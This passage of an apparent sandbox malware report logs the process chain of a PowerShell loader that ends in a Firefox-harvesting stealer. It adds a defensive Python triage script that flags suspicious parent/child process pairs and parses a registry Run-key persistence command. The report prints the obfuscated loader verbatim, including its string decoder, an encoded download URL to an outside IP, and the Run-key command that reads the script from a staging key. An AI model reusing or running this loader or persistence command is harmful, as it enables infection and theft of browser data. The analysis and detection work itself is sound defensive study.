,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
Source: C:\Windows\SysWOW64\xcopy.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
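Read top-down, the process-creation rows above give the whole chain: wscript.exe runs ping and cmd.exe and then PowerShell; the 64-bit PowerShell relaunches itself from SysWOW64, which starts Windows Mail's wab.exe; wab.exe uses cmd.exe and reg.exe to write a Run value named Achaque; a dropped executable under a random directory in Program Files starts xcopy.exe, and xcopy.exe starts Firefox. The Run value is of type REG_EXPAND_SZ, so `%Akkvisitiv%` (presumably the PowerShell path; its definition is not in these rows) is expanded at logon, and the script itself is read from `HKCU:\Respirometres\Xenoplastic`, so neither an interpreter path nor a payload is visible in the Run key. The Python below is an added triage script written for this page, not Joe Sandbox code: it parses rows in the report's own "Source: ... Process created: ..." form, flags the parent/child pairs that the report's signatures call out, and breaks the REG ADD command into key, value name, type, launcher variable and staging location. SAMPLE_REPORT is constructed from the rows above, with the long PowerShell command line truncated.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# A process-creation row as rendered by the report:
# "Source: <parent image>Process created: <child image> <command line>".
# The " | " separator and the trailing "Jump to behavior" link text are tolerated.
LINE_RE = re.compile(
    r"Source:\s*(?P<parent>.+?)\s*(?:\|\s*)?Process created:\s*"
    r"(?P<child>\S.*?\.exe)\b\s*(?P<cmdline>.*)$",
    re.IGNORECASE,
)
REG_ADD_RE = re.compile(
    r'REG\s+ADD\s+(?P<key>\S+).*?/v\s+"(?P<name>[^"]+)".*?/t\s+(?P<type>\S+).*?/d\s+"(?P<data>.*)"',
    re.IGNORECASE,
)
# "(Get-ItemProperty -Path 'HKCU:\X\').Y" pulls the real script out of a staging key
STAGED_RE = re.compile(r"Get-ItemProperty\s+-Path\s+'(?P<key>[^']+)'\)\.(?P<value>\w+)")

@dataclass
class Finding:
    parent: str
    child: str
    reason: str
    cmdline: str

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

# (parent image, child image, regex over the child's command line or None, why it matters)
RULES: List[Tuple[str, str, Optional[str], str]] = [
    ("wscript.exe", "powershell.exe", None, "script host launching PowerShell"),
    ("wscript.exe", "ping.exe", None, "script host running ping (delay or connectivity probe)"),
    ("powershell.exe", "wab.exe", None, "PowerShell starting Windows Mail wab.exe as a host for injected code"),
    ("wab.exe", "cmd.exe", r"CurrentVersion\\Run\b", "wab.exe writing an HKCU Run key"),
    ("cmd.exe", "reg.exe", r"CurrentVersion\\Run\b.*REG_EXPAND_SZ",
     "Run value of type REG_EXPAND_SZ hides the launcher behind an environment variable"),
    ("xcopy.exe", "firefox.exe", None, "xcopy.exe starting Firefox (injected stealer harvesting browser data)"),
]

def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    m = LINE_RE.search(line.replace("Jump to behavior", "").strip())
    return (m.group("parent"), m.group("child"), m.group("cmdline")) if m else None

def analyze(lines: List[str]) -> List[Finding]:
    """Applies RULES to every parseable row and returns the matches in row order."""
    findings: List[Finding] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        parent, child, cmdline = parsed
        for p, c, pattern, reason in RULES:
            if basename(parent) == p and basename(child) == c and (
                pattern is None or re.search(pattern, cmdline, re.IGNORECASE)
            ):
                findings.append(Finding(parent, child, reason, cmdline))
    return findings

def parse_reg_add(cmdline: str) -> Optional[dict]:
    """Splits a REG ADD persistence command into its parts; notes an %ENV% launcher
    at the start of the data and any staging key the data reads the script from."""
    m = REG_ADD_RE.search(cmdline)
    if not m:
        return None
    data = m.group("data")
    env = re.match(r"%(\w+)%", data)
    staged = STAGED_RE.search(data)
    return {
        "key": m.group("key"),
        "name": m.group("name"),
        "type": m.group("type").upper(),
        "launcher_env_var": env.group(1) if env else None,
        "staging_key": staged.group("key") if staged else None,
        "staging_value": staged.group("value") if staged else None,
    }

# Constructed from the rows above; the PowerShell command line is truncated to "..."
SAMPLE_REPORT = [
    r'Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1',
    r'Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir',
    r'Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;..."',
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"',
    r'''Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"''',
    r'''Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"''',
    r'Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"',
    r'Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_REPORT):
        print(f"{basename(f.parent)} -> {basename(f.child)}: {f.reason}")
    print(parse_reg_add(parse_line(SAMPLE_REPORT[5])[2]))
```

The rules are deliberately parent/child pairs rather than image names alone: wab.exe, xcopy.exe and reg.exe are all legitimate binaries, and it is the caller (PowerShell, a Program Files binary with a random directory name, a mail client) and the Run-key arguments that make them worth a look. To act on the persistence finding, both the Run value and the staging key `HKCU:\Respirometres` need to be removed; deleting only the Run value leaves the script on disk in the registry.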
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
